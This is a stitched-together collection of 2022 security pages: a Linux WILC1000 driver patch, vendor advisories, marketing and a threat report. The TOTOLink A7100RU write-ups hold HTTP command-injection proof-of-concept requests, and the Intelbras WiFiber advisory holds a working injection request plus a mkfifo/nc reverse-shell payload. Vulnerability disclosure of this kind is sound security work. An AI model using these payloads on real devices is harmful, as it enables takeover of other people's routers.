An issue was discovered in the Linux kernel before 6.0.11. Missing validation of the number of channels in drivers/net/wireless/microchip/wilc1000/cfg80211.c in the WILC1000 wireless driver can trigger a heap-based buffer overflow when copying the list of operating channels from Wi-Fi management frames.

From: Phil Turnbull <philipturnbull@github.com>
To: linux-wireless@vger.kernel.org
Cc: ajay.kathat@microchip.com, claudiu.beznea@microchip.com,
	kvalo@kernel.org, Phil Turnbull <philipturnbull@github.com>
Subject: \[PATCH 4/4\] wifi: wilc1000: validate number of channels
Date: Wed, 23 Nov 2022 10:35:43 -0500	\[thread overview\]
Message-ID: <20221123153543.8568-5-philipturnbull@github.com> (raw)
In-Reply-To: <20221123153543.8568-1-philipturnbull@github.com\>

There is no validation of 'e->no\_of\_channels' which can trigger an
out-of-bounds write in the following 'memset' call. Validate that the
number of channels does not extends beyond the size of the channel list
element.

Signed-off-by: Phil Turnbull <philipturnbull@github.com>
Tested-by: Ajay Kathat <ajay.kathat@microchip.com>
Acked-by: Ajay Kathat <ajay.kathat@microchip.com>
---
 .../wireless/microchip/wilc1000/cfg80211.c    | 22 ++++++++++++++-----
 1 file changed, 16 insertions(+), 6 deletions(-)

diff --git a/drivers/net/wireless/microchip/wilc1000/cfg80211.c b/drivers/net/wireless/microchip/wilc1000/cfg80211.c
index c4d5a272ccc0..b545d93c6e37 100644
--- a/drivers/net/wireless/microchip/wilc1000/cfg80211.c
+++ b/drivers/net/wireless/microchip/wilc1000/cfg80211.c
@@ -981,19 +981,29 @@ static inline void wilc\_wfi\_cfg\_parse\_ch\_attr(u8 \*buf, u32 len, u8 sta\_ch)
 	}
 
 	if (ch\_list\_idx) {
\-		u16 attr\_size;
-		struct wilc\_ch\_list\_elem \*e;
-		int i;
+		u16 elem\_size;
 
 		ch\_list = (struct wilc\_attr\_ch\_list \*)&buf\[ch\_list\_idx\];
\-		attr\_size = le16\_to\_cpu(ch\_list->attr\_len);
-		for (i = 0; i < attr\_size;) {
+		/\* the number of bytes following the final 'elem' member \*/
+		elem\_size = le16\_to\_cpu(ch\_list->attr\_len) -
+			(sizeof(\*ch\_list) - sizeof(struct wilc\_attr\_entry));
+		for (unsigned int i = 0; i < elem\_size;) {
+			struct wilc\_ch\_list\_elem \*e;
+
 			e = (struct wilc\_ch\_list\_elem \*)(ch\_list->elem + i);
+
+			i += sizeof(\*e);
+			if (i > elem\_size)
+				break;
+
+			i += e->no\_of\_channels;
+			if (i > elem\_size)
+				break;
+
 			if (e->op\_class == WILC\_WLAN\_OPERATING\_CLASS\_2\_4GHZ) {
 				memset(e->ch\_list, sta\_ch, e->no\_of\_channels);
 				break;
 			}
\-			i += e->no\_of\_channels;
 		}
 	}
 
-- 
2.34.1

     prev parent reply	other threads:\[~2022-11-23 15:36 UTC|newest\]

**Thread overview:** 6+ messages / expand\[flat|nested\]  mbox.gz  Atom feed  top
2022-11-23 15:35 \[PATCH 0/4\] wilc1000: Improve RSN and attribute parsing Phil Turnbull
2022-11-23 15:35 \` \[PATCH 1/4\] wifi: wilc1000: validate pairwise and authentication suite offsets Phil Turnbull
2022-11-24 16:11   \` Kalle Valo
2022-11-23 15:35 \` \[PATCH 2/4\] wifi: wilc1000: validate length of IEEE80211\_P2P\_ATTR\_OPER\_CHANNEL attribute Phil Turnbull
2022-11-23 15:35 \` \[PATCH 3/4\] wifi: wilc1000: validate length of IEEE80211\_P2P\_ATTR\_CHANNEL\_LIST attribute Phil Turnbull
**2022-11-23 15:35 \` Phil Turnbull \[this message\]**

**Reply instructions:**

You may reply publicly to this message via plain-text email
using any one of the following methods:

\* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting\_style#Interleaved\_style

\* Reply using the **\--to**, **\--cc**, and **\--in-reply-to**
  switches of git-send-email(1):

  git send-email \\
    --in-reply-to=20221123153543.8568-5-philipturnbull@github.com \\
    --to=philipturnbull@github.com \\
    --cc=ajay.kathat@microchip.com \\
    --cc=claudiu.beznea@microchip.com \\
    --cc=kvalo@kernel.org \\
    --cc=linux-wireless@vger.kernel.org \\
    /path/to/YOUR\_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

\* If your mail client supports setting the **In-Reply-To** header
  via mailto: links, try the mailto: link

Be sure your reply has a **Subject:** header at the top and a blank line before the message body.

This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.

CVE-2022-47518: [PATCH 4/4] wifi: wilc1000: validate number of channels

An issue was discovered in the Linux kernel before 6.0.11. Missing offset validation in drivers/net/wireless/microchip/wilc1000/hif.c in the WILC1000 wireless driver can trigger an out-of-bounds read when parsing a Robust Security Network (RSN) information element from a Netlink packet.

Permalink

Browse files

wifi: wilc1000: validate pairwise and authentication suite offsets

There is no validation of 'offset' which can trigger an out-of-bounds
read when extracting RSN capabilities.

Signed-off-by: Phil Turnbull <philipturnbull@github.com>
Tested-by: Ajay Kathat <ajay.kathat@microchip.com>
Acked-by: Ajay Kathat <ajay.kathat@microchip.com>
Signed-off-by: Kalle Valo <kvalo@kernel.org>
Link: https://lore.kernel.org/r/20221123153543.8568-2-philipturnbull@github.com

*   Loading branch information

CVE-2022-47520: wifi: wilc1000: validate pairwise and authentication suite offsets · torvalds/linux@cd21d99

The default console presented to users over telnet (when enabled) is restricted to a subset of commands. Commands issued at this console, however, appear to be fed directly into a system call or other similar function. This allows any authenticated user to execute arbitrary commands on the device.

_All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability._

_Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order._

_For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page._

_If you have questions or corrections about this advisory, please email \[email protected\]_

Tenable Advisory ID

TRA-2022-37

Affected Products

NETGEAR Nighthawk WiFi6 Router prior to V1.0.9.90

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable.io Vulnerability Management trial also includes Tenable Lumin, Tenable.io Web Application Scanning and Tenable.cs Cloud Security.

 BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

65 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Nessus Professional Free**

FREE FOR 7 DAYS

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

**Buy Nessus Professional**

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable.io Vulnerability Management trial also includes Tenable Lumin, Tenable.io Web Application Scanning and Tenable.cs Cloud Security.

Tenable.io

BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

65 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Tenable.io Web Application Scanning**

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable.io platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. **Sign up now.**

Your Tenable Web Application Scanning trial also includes Tenable.io Vulnerability Management, Tenable Lumin and Tenable.cs Cloud Security.

**Buy Tenable.io Web Application Scanning**

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

**Try Tenable.io Container Security**

Enjoy full access to the only container security offering integrated into a vulnerability management platform. Monitor container images for vulnerabilities, malware and policy violations. Integrate with continuous integration and continuous deployment (CI/CD) systems to support DevOps practices, strengthen security and support enterprise policy compliance.

**Buy Tenable.io Container Security**

Tenable.io Container Security seamlessly and securely enables DevOps processes by providing visibility into the security of container images – including vulnerabilities, malware and policy violations – through integration with the build process.

**Thank You**

Thank you for your interest in the Tenable.io Container Security program. A representative will be in touch soon.

**Try Tenable Lumin**

Visualize and explore your Cyber Exposure, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable.io Vulnerability Management, Tenable.io Web Application Scanning and Tenable.cs Cloud Security.

**Buy Tenable Lumin**

Contact a Sales Representative to see how Lumin can help you gain insight across your entire organization and manage cyber risk.

**Thank You**

Thank you for your interest in Tenable Lumin. A representative will be in touch soon.

**Request a demo of Tenable.sc**

Please fill out this form with your contact information.

A sales representative will contact you shortly to schedule a demo.

_\* Field is required_

**Request a demo of Tenable.ot**

Get the Operational Technology Security You Need.

Reduce the Risk You Don’t.

**Request a demo of Tenable.ad**

Continuously detect and respond to Active Directory attacks. No agents. No privileges.

On-prem and in the cloud.

**Try Tenable.cs**

Enjoy full access to detect and fix cloud infrastructure misconfigurations and view runtime vulnerabilities. Sign up for your free trial now.

Your Tenable.cs Cloud Security trial also includes Tenable.io Vulnerability Management, Tenable Lumin and Tenable.io Web Application Scanning.

**Contact a Sales Rep to Buy Tenable.cs**

Contact a Sales Representative to learn more about Tenable.cs Cloud Security and see how easy it is to onboard your cloud accounts and get visibility into both cloud misconfigurations and vulnerabilities within minutes.

**Thank You**

Thank you for your interest in Tenable.cs. A representative will be in touch soon.

**See  
Tenable One  
In Action**

Exposure management for the modern attack surface.

**See Tenable.asm In Action**

Know the exposure of every asset on any platform.

**Thank You**

Thank you for your interest in Tenable.asm. A representative will be in touch soon.

**Try Nessus Expert Free**

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Already have Nessus Professional?**  
Upgrade to Nessus Expert free for 7 days.

**Buy Nessus Expert**

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

CVE-2022-47210: NETGEAR Nighthawk WiFi6 Router Multiple Vulnerabilities

Reality has a way of asserting itself, irrespective of any personal or commercial choices we make, good or bad. For example, just recently, the city services of Antwerp in Belgium were the victim of a highly disruptive cyberattack. 
As usual, everyone cried "foul play" and suggested that proper cybersecurity measures should have been in place. And again, as usual, it all happens a bit too late.

Reality has a way of asserting itself, irrespective of any personal or commercial choices we make, good or bad. For example, just recently, the city services of Antwerp in Belgium were the victim of a highly disruptive cyberattack.

As usual, everyone cried "foul play" and suggested that proper cybersecurity measures should have been in place. And again, as usual, it all happens a bit too late. There was nothing special or unique about the attack, and it wasn't the last of its kind either.

So why are we, in IT, still happily whistling into the wind and moving along as if nothing happened? Is everyone's disaster recovery plan really that good? Are all the security measures in place – and tested?

**Let's Do a Quick Recap (of What You Should Be Doing)**

First, cover the basics. Perform proper user training that includes all of the usual: password hygiene, restrictions on account sharing, and clear instructions not to open untrusted emails or to access unscrupulous websites. It's an inconvenient fact that human actions continue to be the weakest link in cyber defense, but it's a fact.

Thinking about the infrastructure side, consider proper asset auditing, because you can't protect what you don't know exists. As a next step, implement network segmentation to separate all traffic into the smallest possible divisions.

Simply put, if a server does not need to see or talk to another server, then that server shouldn't be connected to the same VLAN, no exceptions. Remote access should move from traditional VPN access to zero-trust networking alternatives.

Everything must be encrypted, even if communication is internal only. You never know what has already been breached, so someone can eavesdrop where you least expect it.

Finally, don't let users randomly plug devices into your network. Lock ports and restrict Wi-Fi access to known devices. Users will complain, but that is just part of the tradeoff. Either way, exceptions should be kept to a minimum.

**Patching Your Servers Really Matters**

Moving on to servers, the key advice is to keep everything updated via patching. That's true for exposed, public-facing servers, such as web servers – but it's equally as true for the print server tucked away in the closet.

An unpatched server is a vulnerable server and it only takes one vulnerable server to bring down the fortress. If patching is too disruptive to do daily, look to alternative methods such as live patching and use it everywhere you can.

Hackers are crafty individuals and they don't need you to make it easier for them, so plug as many holes as possible – as fast as possible. Thanks to live patching, you don't have to worry about prioritizing vulnerabilities to patch, because you can just patch them all. There is no downside.

**Take a Proactive Approach**

If a server no longer has a reason to exist, decommission it or destroy the instance. Whether it's a container, VM, instance, or a node, you need to act ASAP. If you don't, you'll end up forgetting about it until it is breached. At that point, it's too late.

So, you should maintain a proactive approach. Keep up with the latest threats and security news. While some vulnerabilities have a disproportionate share of attention due to being "named" vulnerabilities, sometimes it's one of the countless "regular" vulnerabilities that hits the hardest. You can use a vulnerability management tool to help with this.

Put in place a disaster recovery plan. Start from the simple premise of "what if we woke up tomorrow and none of our IT worked?"

Answer these questions: How quickly can I get barebone services up and running? How long does it take to restore the entire data backup? Are we testing the backups regularly? Is the deployment process for services properly documented… even if it's a hardcopy of the ansible scripts? What are the legal implications of losing our systems, data, or infrastructure for several weeks?

**Most Importantly: Act Now, Don't Delay**

If you struggle with any of the answers to the questions above, it means you have work to do – and that's not something you should delay.

As an organization, you want to avoid getting into a position where your systems are down, your customers are going to your competitor's website, and your boss is demanding answers – while all you have to offer is a blank stare and a scared look on your face.

That said, it's not a losing battle. All the questions we posed can be answered, and the practices described above – while only just scratching the very surface of everything that should be done – are a good starting point.

If you haven't yet looked into it… well, the best starting point is right now – before an incident happens.

_This article is written and sponsored by_ _TuxCare__, the industry leader in enterprise-grade_ _Linux automation__. TuxCare offers unrivaled levels of efficiency for developers, IT security managers, and_ _Linux server administrators_ _seeking to affordably enhance and simplify their cybersecurity operations. TuxCare's Linux kernel live security patching, and standard and_ _enhanced support services_ _assist in securing and supporting over one million production workloads._

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Cyber Security Is Not a Losing Game – If You Start Right Now

TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the wscDisabled parameter in the setting/setWiFiSignalCfg function.

**TOTOlink A7100RU Command injection vulnerability****Overview**

*   Manufacturer's website information：http://totolink.net/
*   Firmware download address ： http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**2.Vulnerability details**

The program passes the content obtained by the wscdisabled parameter to the V3 parameter, then assigns V3 to V6, and finally brings V6 to UCI\_ Set\_ In str function

Format the A4 matched content into V11 through snprintf function, and then bring V11 into cstesystem function

The function directly brings user input into the execv function, which has a command injection vulnerability

**3.Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V7.4cu.2313\_B20191024
2.  Attack with the following overflow POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 79
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/adm/status.asp?timestamp=1647872753309
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647872744:2
    Connection: close
    
    {"topicurl":"setting/setWiFiSignalCfg",
    "wscDisabled":"1$(ls>/tmp/123;)"}
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-46631: IOT_vuln/TOTOLink/A7100RU/6 at main · EPhaha/IOT_vuln

TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the wscDisabled parameter in the setting/setWiFiWpsCfg function.

**TOTOlink A7100RU Command injection vulnerability****Overview**

*   Manufacturer's website information：http://totolink.net/
*   Firmware download address ： http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**2.Vulnerability details**

The program passes the content obtained by the wscdisabled parameter to the V5 parameter, and then brings V5 into UCI\_ Set\_ STR function

Format the A4 matched content into V11 through snprintf function, and then bring V11 into cstesystem function

The function directly brings user input into the execv function, which has a command injection vulnerability

**3.Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V7.4cu.2313\_B20191024
2.  Attack with the following overflow POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 79
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/adm/status.asp?timestamp=1647872753309
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647872744:2
    Connection: close
    
    {"topicurl":"setting/setWiFiWpsCfg",
    "wscDisabled":"1$(ls>/tmp/123;)"}
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-46634: IOT_vuln/TOTOLink/A7100RU/7 at main · EPhaha/IOT_vuln

New research also analyzes the commoditization of adversary-in-the-middle attacks, JavaScript obfuscation in exploit kits, and a malware family with Gothic Panda ties.

**SEATTLE – December 15, 2022** **–** WatchGuard® Technologies, a global leader in unified cybersecurity, today released its latest quarterly Internet Security Report, detailing the top malware trends, and network and endpoint security threats analyzed by WatchGuard Threat Lab researchers in Q3 2022. Key findings from the data reveal the quarter’s top malware threat was detected exclusively over encrypted connections, ICS attacks are maintaining popularity, LemonDuck malware is evolving beyond cryptominer delivery, a Minecraft cheat engine is delivering a malicious payload, and much more.“We can’t emphasize enough how important it is for HTTPS inspection to be enabled, even if it requires some tuning and exceptions to do properly. The majority of malware arrives over encrypted HTTPS, and not inspecting it means you’re missing those threats,” said Corey Nachreiner, chief security officer at WatchGuard Technologies. “Rightfully so, the big prizes for attackers like an Exchange server or a SCADA management system deserve extraordinary attention as well this quarter. When a patch is available, it’s important to update immediately, as attackers will eventually benefit from any organization that has yet to implement the latest patch.” 

Other key findings from the Q3 Internet Security Report include:

*   The vast majority of malware arriving over encrypted connections – Although Agent.IIQ placed third in the normal top 10 malware list this quarter, it landed in the #1 spot at the top of the encrypted malware list for Q3. In fact, if you look at the detections for it on both of these lists, you’ll see all Agent.IIQ detections come from encrypted connections. In Q3, if a Firebox was inspecting encrypted traffic, 82% of the malware it detected was through that encrypted connection, leaving only a meager 18% detected without encryption. If you’re not inspecting encrypted traffic on your Firebox, it’s very likely that this average ratio remains true, and you are missing a huge portion of malware. Hopefully, you at least have endpoint protection implemented for a chance to catch it further down the cyber kill chain.

*   ICS and SCADA systems remain trending attack targets – New to the top 10 network attacks list this quarter is a SQL injection-type attack that affected several vendors. One of these companies is Advantech, whose WebAccess portal is used for SCADA systems across a variety of critical infrastructure. Another serious exploit in Q3, which also appeared in the top five network attacks by volume, involved Schneider Electric's U.motion Builder software versions 1.2.1 and prior. This is a stark reminder that attackers aren’t quietly waiting for an opportunity – rather, they are actively seeking system compromise wherever possible.
*   Exchange server vulnerabilities continuing to pose risk – The most recent CVE among the Threat Lab’s new signatures this quarter, CVE-2021-26855, is a Microsoft Exchange Server Remote Code Execution (RCE) vulnerability for on-premises servers. This RCE vulnerability was given a 9.8 CVE score and is known to have been exploited. The date and severity of CVE-2021-26855 should also ring a bell, as it is one of the exploits used by the group HAFNIUM. While most Exchange servers affected by it have likely been patched by now, _most_ does not equate to _all_. Therefore, risks remain.

*   Threat actors targeting seekers of free software – Fugrafa downloads malware that injects malicious code. This quarter, the Threat Lab examined a sample of it that was found in a cheat engine for the popular game Minecraft. While the file shared primarily on Discord claims to be the Minecraft cheat engine Vape V4 Beta, that’s not all it contains. Agent.FZUW has some similarities to Variant.Fugrafa, but instead of installation through a cheat engine, the file itself pretends to have cracked software. The Threat Lab discovered this particular sample has connections with Racoon Stealer, a cryptocurrency hacking campaign used to hijack account information from cryptocurrency exchange services.

*   LemonDuck malware evolving beyond cryptominer delivery – Even with a dip in total blocked or tracked malware domains for the third quarter of 2022, it is easy to see that attacks on unsuspecting users are still high. With three new additions to the top malware domains list – two of which were former LemonDuck malware domains, and the other part of an Emotet classified domain – Q3 saw more malware and attempted malware sites that were newer domains than usual. This trend will change and modify with the landscape of cryptocurrency in turmoil as attackers look for other venues to trick users. Keeping DNS protection enabled is a way to monitor and block unsuspecting users from allowing malware or other serious issues into your organization.

*   JavaScript obfuscation in exploit kits – Signature 1132518, a generic vulnerability for detecting JavaScript Obfuscation attacks against browsers, was the only new addition to the most-widespread network attack signatures list this quarter. JavaScript is a common vector for attacking users and threat actors use JavaScript-based exploit kits all the time – in malvertising, watering hole and phishing attacks, just to name a few. As the defensive fortifications have improved on browsers, so have attackers’ ability to obfuscate malicious JavaScript code.

*   Anatomy of commoditized adversary-in-the-middle attacks – While multi-factor authentication (MFA) is undeniably the single best technology you can deploy to protect against the bulk of authentication attacks, it is not on its own a silver bullet against all attack vectors. Cyber adversaries have made this clear with the rapid rise and commoditization of adversary-in-the-middle (AitM) attacks, and the Threat Lab’s deep dive on EvilProxy, the top security incident of Q3, shows just how malicious actors are beginning to pivot to more sophisticated AitM techniques. Like the Ransomware as a Service offering made popular in recent years, the September 2022 release of an AitM toolkit called EvilProxy has significantly lowered the barrier of entry for what was previously a sophisticated attack technique. From a defensive standpoint, successfully combatting this kind of AitM attack technique requires a mix of both technical tools and user awareness.
*   A malware family with Gothic Panda ties – The Threat Lab’s Q2 2022 report described how Gothic Panda—a state-sponsored threat actor connected to China’s Ministry of State Security—was known to use one of the top malware detections from that quarter. Interestingly, the top encrypted malware list for Q3 includes a malware family called Taidoor, which was not only created by Gothic Panda but has only been seen used by Chinese government cyber actors. While this malware typically focuses on targets in Japan and Taiwan in general, the Generic.Taidoor sample analyzed this quarter was found primarily targeting organizations in France, suggesting that some Fireboxes in this region may have detected and blocked parts of a state-sponsored cyberattack.
*   New ransomware and extortion groups in the wild –Additionally this quarter, the Threat Lab is excited to announce a new, concerted effort to track current ransomware extortion groups and build out its threat intelligence capabilities to provide more ransomware-related information in future reports. LockBit tops the list for Q3 with over 200 public extortions on their dark web page – nearly four times more than that of Basta, the second most prolific ransomware group WatchGuard observed this quarter.WatchGuard’s quarterly research reports are based on anonymized Firebox Feed data from active WatchGuard Fireboxes whose owners have opted to share data in direct support of the Threat Lab’s research efforts. In Q3, WatchGuard blocked a total of more than 17.3 million malware variants (211 per device) and more than 2.3 million network threats (28 per device). The full report includes details on additional malware and network trends from Q3 2022, recommended security strategies, critical defense tips for businesses of all sizes and in any sector, and more.
    
    For a detailed view of WatchGuard’s research, read the complete Q3 2022 Internet Security Report here.
    
    About WatchGuard Technologies, Inc.
    
    WatchGuard® Technologies, Inc. is a global leader in unified cybersecurity. Our Unified Security Platform® approach is uniquely designed for managed service providers to deliver world-class security that increases their business scale and velocity while also improving operational efficiency. Trusted by more than 17,000 security resellers and service providers to protect more than 250,000 customers, the company’s award-winning products and services span network security and intelligence, advanced endpoint protection, multi-factor authentication, and secure Wi-Fi. Together, they offer five critical elements of a security platform: comprehensive security, shared knowledge, clarity & control, operational alignment, and automation. The company is headquartered in Seattle, Washington, with offices throughout North America, Europe, Asia Pacific, and Latin America. To learn more, visit WatchGuard.com.
    

For additional information, promotions and updates, follow WatchGuard on Twitter (@WatchGuard), on Facebook, or on the LinkedIn Company page. Also, visit our InfoSec blog, Secplicity, for real-time information about the latest threats and how to cope with them at www.secplicity.org. 

Subscribe to The 443 – Security Simplified podcast at Secplicity.org, or wherever you find your favorite podcasts.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

WatchGuard Threat Lab Report Finds Top Threat Arriving Exclusively Over Encrypted Connections

Intelbras WiFiber 120AC inMesh version 1.1-220216 suffers from an authenticated command injection vulnerability.

    CyberDanube Security Research 20221009-0-------------------------------------------------------------------------------                 title| Authenticated Command Injection              product| Intelbras WiFiber 120AC inMesh   vulnerable version| 1.1-220216        fixed version| 1-1-220826           CVE number| CVE-2022-40005               impact| High             homepage| https://www.intelbras.com                found| 2022-08-01                   by| T. Weber (Office Vienna)                     | CyberDanube Security Research                     | Vienna | St. Pölten                     |                     | https://www.cyberdanube.com------------------------------------------------------------------------------- Vendor description------------------------------------------------------------------------------- "We are Intelbras. A company that for 45 years has been offering innovativesolutions in security, networks, communication and energy. Our dream began tocome to life there in 1976, in the city of São José, having originated from anINspiration and a promising idea: to manufacture PABX centrals. During the80's, we surprised the market with the launch of the first PABX developed withnational technology, a product that showed everyone our innovative DNA. The 90swere marked by the consolidation of the company in the telecommunicationssegment and we became leaders in the PABX and telephone terminals segment. Theturn of the millennium represented the search for greater connection andproximity to people, something that is in total harmony with our philosophy tothis day. More consolidated in the market, in 2010 we opened 3 manufacturingunits, located in Santa Rita do Sapucaí/MG, Manaus/AM and São José/SC.We reached our 45th birthday having reached a historic milestone: we have beena company listed on the B3 since February 2021. Our trajectory so far has beenINnovative, INtelligent and INSpiring. We saw innovation, which is part of ourDNA, increasingly present in our daily lives. And it was only possible towrite a story so full of achievements because employees, partners and customerswere close and believed in us."Source: https://www.intelbras.com/en/institutional/who-we-areVulnerable versions------------------------------------------------------------------------------- WiFiber 120AC inMesh / 1.1-220216Vulnerability overview------------------------------------------------------------------------------- 1) Authenticated Command Injection (CVE-2022-40005)The web server of the device is prone to an authenticated command injection.It allows an attacker to gain full access to the underlying operating system ofthe device with all implications. If such a device is acting as key device inan industrial network, more extensive damage in the corresponding network canbe done by an attacker.Proof of Concept------------------------------------------------------------------------------- 1) Authenticated Command Injection (CVE-2022-40005)The web server is prone to an authenticated command injection via POSTparameters. The following proof-of-concept shows how to inject the command"ls /" to the system which gets executed in the background:=============================================================================== POST /boaform/formPing6 HTTP/1.1Host: 192.168.3.147User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 87Origin: http://192.168.3.147Connection: closeReferer: http://192.168.3.147/ping6.aspUpgrade-Insecure-Requests: 1pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908 =============================================================================== The following commands can be used to open a reverse shell:"rm -f /tmp/f""mkfifo /tmp/f""cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.138 8889 >/tmp/f"Those commands were sent via a crafted POST request:=============================================================================== POST /boaform/formTracert HTTP/1.1Host: 192.168.3.147User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 255Origin: http://192.168.3.147Connection: closeReferer: http://192.168.3.147/tracert.aspUpgrade-Insecure-Requests: 1proto=0&traceAddr=%3Brm+-f+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.3.138+8889+%3E%2Ftmp%2Ff%3B&trys=3&timeout=5&datasize=56&dscp=0&maxhop=30&wanif=65535&go=+Ir&submit-url=%2Ftracert.asp&postSecurityFlag=29290 =============================================================================== The vulnerability was manually verified on an emulated device by using theMEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).Solution------------------------------------------------------------------------------- Update to firmware version 1-1-220826.https://backend.intelbras.com/sites/default/files/2022-08/ONT_Wifiber_120_AC_Vers%C3%A3o_1-1-220826.zip Workaround------------------------------------------------------------------------------- NoneRecommendation------------------------------------------------------------------------------- CyberDanube recommends Intelbras customers to upgrade the firmware to thelatest version available.Contact Timeline------------------------------------------------------------------------------- 2022-08-02: Contacting Intelbras via suporte@intelbras.com.br.2022-08-03: Request from Intelbras to send the advisory tocsirt@intelbras.com.br; Sent the advisory to this address.2022-08-30: Asked for status update; Vendor answered that the new firmware             version has been released the day before. Set the disclosure date             to 2022-10-03 (60 days policy).2022-10-03: Shifted disclosure date to 2022-10-09 due to sick colleagues.2022-10-09: Coordinated disclosure of advisory.Web: https://www.cyberdanube.comTwitter: https://twitter.com/cyberdanubeMail: research at cyberdanube dot comEOF T. Weber / @2022On 09.10.22 17:21, Thomas Weber wrote:> CyberDanube Security Research 20221009-0> ------------------------------------------------------------------------------- >>                title| Authenticated Command Injection>              product| Intelbras WiFiber 120AC inMesh>   vulnerable version| 1.1-220216>        fixed version| 1-1-220826>           CVE number|>               impact| High>             homepage| https://www.intelbras.com>                found| 2022-08-01>                   by| T. Weber (Office Vienna)>                     | CyberDanube Security Research>                     | Vienna | St. Pölten>                     |>                     | https://www.cyberdanube.com> ------------------------------------------------------------------------------- >>> Vendor description> ------------------------------------------------------------------------------- >> "We are Intelbras. A company that for 45 years has been offering > innovative> solutions in security, networks, communication and energy. Our dream > began to> come to life there in 1976, in the city of São José, having originated > from an> INspiration and a promising idea: to manufacture PABX centrals. During > the> 80's, we surprised the market with the launch of the first PABX > developed with> national technology, a product that showed everyone our innovative > DNA. The 90s> were 